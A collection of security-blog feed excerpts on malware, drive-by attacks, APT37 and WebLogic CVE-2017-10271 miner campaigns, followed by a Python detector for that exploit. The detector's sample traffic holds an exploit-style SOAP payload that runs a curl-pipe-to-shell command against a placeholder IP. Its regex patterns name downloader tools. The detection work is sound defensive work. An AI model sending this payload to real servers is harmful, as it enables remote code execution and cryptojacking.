Avzhan DDoS bot dropped by Chinese drive-by attack

The Avzhan DDoS bot is back in the wild again, this time being dropped by a Chinese drive-by attack. In this post, we'll take a deep dive into its functionality and compare the sample we captured with the one described in the past. Categories: Malware, Threat analysis. Tags: avzhan, Bot, botnet, ddos, drive-by attack, exploit kit, malware. The post Avzhan DDoS bot dropped by Chinese drive-by attack appeared first on Malwarebytes Labs.

Drive-by download campaign targets Chinese websites, experiments with exploits

This custom-made drive-by download attack targets some Chinese websites and their visitors while experimenting with exploits. Categories: Threat analysis. Tags: Chinese, coinhive, drive-by, EK, exploit kit, exploits, Flash Player, Internet Explorer, svchost.exe. The post Drive-by download campaign targets Chinese websites, experiments with exploits appeared first on Malwarebytes Labs.

Avast tracks down Tempting Cedar Spyware

A few months ago, one of our customers contacted us regarding strange messages he received on Facebook Messenger. The messages came from fake Facebook profiles belonging to attractive, but fictitious women. These women encouraged him to download another chat application to continue their conversations. The chat application the women referred him to was spyware, disguised as the Kik Messenger app, distributed through a very convincing fake site.

As Facial Recognition Accelerates, VASCO Responds with a Face ID SDK

Face ID is fast becoming a differentiator for organizations that want to provide a frictionless mobile experience. While biometric authentication remains the exception and not yet the rule, the analyst community strongly believes digital businesses, especially banks, need to pay attention. For example, in the recent Hype Cycle for Digital Banking Transformation, 2017, Gartner recommends that digital businesses develop world-class capabilities in customer authentication, and specifically, biometric authentication. In response... The post As Facial Recognition Accelerates, VASCO Responds with a Face ID SDK appeared first on VASCO Data Security - Blog.

What the Mueller/Russia Indictment Means for Cybersecurity

On Feb. 16, a federal grand jury in Washington, D.C. returned an indictment against 13 Russian citizens and three Russian companies for a scheme involving information warfare against the political institutions of the United States. Does this portend a new strategy for dealing with cyberthreats or is this merely political theater? The answer, of course,..

Encryption 101: a malware analyst’s primer

A primer on encryption mechanisms and how they are exploited by malware authors, including an introduction to encryption and the main methods used to encrypt ransomware. Categories: Threat analysis. Tags: 101, encryption, ransomware. The post Encryption 101: a malware analyst’s primer appeared first on Malwarebytes Labs.

APT37 (Reaper): The Overlooked North Korean Actor

On Feb. 2, 2018, we published a blog detailing the use of an Adobe Flash zero-day vulnerability (CVE-2018-4878) by a suspected North Korean cyber espionage group that we now track as APT37 (Reaper). Our analysis of APT37’s recent activity reveals that the group’s operations are expanding in scope and sophistication, with a toolset that includes access to zero-day vulnerabilities and wiper malware. We assess with high confidence that this activity is carried out on behalf of the North Korean government given malware development artifacts and targeting that aligns with North Korean state interests. FireEye iSIGHT Intelligence believes that APT37 is aligned with the activity publicly reported as Scarcruft and Group123. Read our report, APT37 (Reaper): The Overlooked North Korean Actor, to learn more about our assessment that this threat actor is working on behalf of the North Korean government, as well as various other details about their operations: Targeting: Primarily South Korea – though also Japan, Vietnam and the Middle East – in various industry verticals, including ...

CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques Used Post-Exploitation and Pre-Mining

Introduction FireEye researchers recently observed threat actors abusing CVE-2017-10271 to deliver various cryptocurrency miners. CVE-2017-10271 is a known input validation vulnerability that exists in the WebLogic Server Security Service (WLS Security) in Oracle WebLogic Server versions 12.2.1.2.0 and prior, and attackers can exploit it to remotely execute arbitrary code. Oracle released a Critical Patch Update that reportedly fixes this vulnerability. Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors. FireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017. Attackers then leveraged this vulnerability to download cryptocurrency miners in victim environments. We saw evidence of organizations located in various countries – including the United States, Australia, Hong Kong, United Kingdom, India, Malaysia, and Spain, as well as those from nearly every industry vertical – being impacted by this activity. Actors involved in cryptocurrency mining operations mainly exploit opportunistic targets rather than specific organizations. This coupled with the diversity of organizations potentially affected by this activity suggests that the external targeting calculus of...
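The excerpt above describes CVE-2017-10271 only at the level of "input validation flaw in WLS Security, exploited to run code and fetch a miner". As an added example (not code from the FireEye post), the following Python classifies captured WebLogic HTTP requests using the publicly documented exploitation pattern for this CVE: a SOAP POST to a `/wls-wsat/` endpoint whose `WorkContext` header carries XMLDecoder `<java>` markup that instantiates a class such as `java.lang.ProcessBuilder`. The endpoint and header names are assumptions drawn from the public proof-of-concept, not from the page; the sample requests are constructed for the example, and the IP address and script name in the payload are placeholders.

```python
import re

# Constructed sample traffic for the example (method, path, body); not real captures.
# Request 2 mimics the public CVE-2017-10271 pattern; request 3 is a benign SOAP
# call to the same endpoint and must not be flagged.
SAMPLE_REQUESTS = [
    ("GET", "/console/login/LoginForm.jsp", ""),
    ("POST", "/wls-wsat/CoordinatorPortType",
     '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
     '<soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">'
     '<java><object class="java.lang.ProcessBuilder">'
     '<array class="java.lang.String" length="3">'
     '<void index="0"><string>/bin/sh</string></void>'
     '<void index="1"><string>-c</string></void>'
     '<void index="2"><string>curl -s http://203.0.113.10/miner.sh | sh</string></void>'
     '</array><void method="start"/></object></java>'
     '</work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>'),
    ("POST", "/wls-wsat/CoordinatorPortType",
     '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
     '<soapenv:Body><ns:ping/></soapenv:Body></soapenv:Envelope>'),
]

# Assumed indicators (from the public PoC, not from the page): the wls-wsat path,
# a WorkContext header, an XMLDecoder <java> element, and dangerous classes.
WLS_WSAT_PATH = re.compile(r"^/wls-wsat/", re.IGNORECASE)
WORKCONTEXT = re.compile(r"<(?:\w+:)?WorkContext\b", re.IGNORECASE)
JAVA_ELEMENT = re.compile(r"<java\b", re.IGNORECASE)
DANGEROUS_CLASS = re.compile(
    r'class="(java\.lang\.ProcessBuilder|java\.lang\.Runtime'
    r'|java\.io\.(?:PrintWriter|FileOutputStream))"')
DOWNLOADER = re.compile(r"\b(curl|wget|certutil|powershell|bitsadmin)\b", re.IGNORECASE)


def classify_request(method: str, path: str, body: str) -> dict:
    """Score one request; the endpoint alone is never enough to flag it."""
    reasons = []
    if method.upper() == "POST" and WLS_WSAT_PATH.search(path):
        reasons.append("POST to a wls-wsat endpoint")
    if WORKCONTEXT.search(body):
        reasons.append("WorkContext SOAP header present")
    has_java = bool(JAVA_ELEMENT.search(body))
    if has_java:
        reasons.append("XMLDecoder <java> element inside the SOAP header")
    cls = DANGEROUS_CLASS.search(body)
    if cls:
        reasons.append("XMLDecoder instantiates " + cls.group(1))
    dl = DOWNLOADER.search(body)
    if dl:
        reasons.append("download-and-execute tool in payload: " + dl.group(1))

    if has_java and cls:
        severity = "high"       # deserialization gadget plus a code-execution class
    elif has_java or cls:
        severity = "medium"     # one half of the pattern; worth a look
    elif len(reasons) >= 2:
        severity = "low"        # endpoint plus WorkContext header, no payload seen
    else:
        severity = "none"       # legitimate WS-AT traffic or unrelated request
    return {"method": method, "path": path, "severity": severity, "reasons": reasons}


def scan(requests) -> list:
    """Return only the requests that score above 'none', in input order."""
    findings = []
    for method, path, body in requests:
        result = classify_request(method, path, body)
        if result["severity"] != "none":
            findings.append(result)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_REQUESTS):
        print(f["severity"].upper(), f["method"], f["path"])
        for r in f["reasons"]:
            print("   -", r)
```

Requiring the `<java>` element rather than just the endpoint keeps ordinary WS-AtomicTransaction traffic out of the alert queue; in practice this logic belongs in a WAF rule or a proxy log parser, and the class list should be extended as new gadget chains are observed.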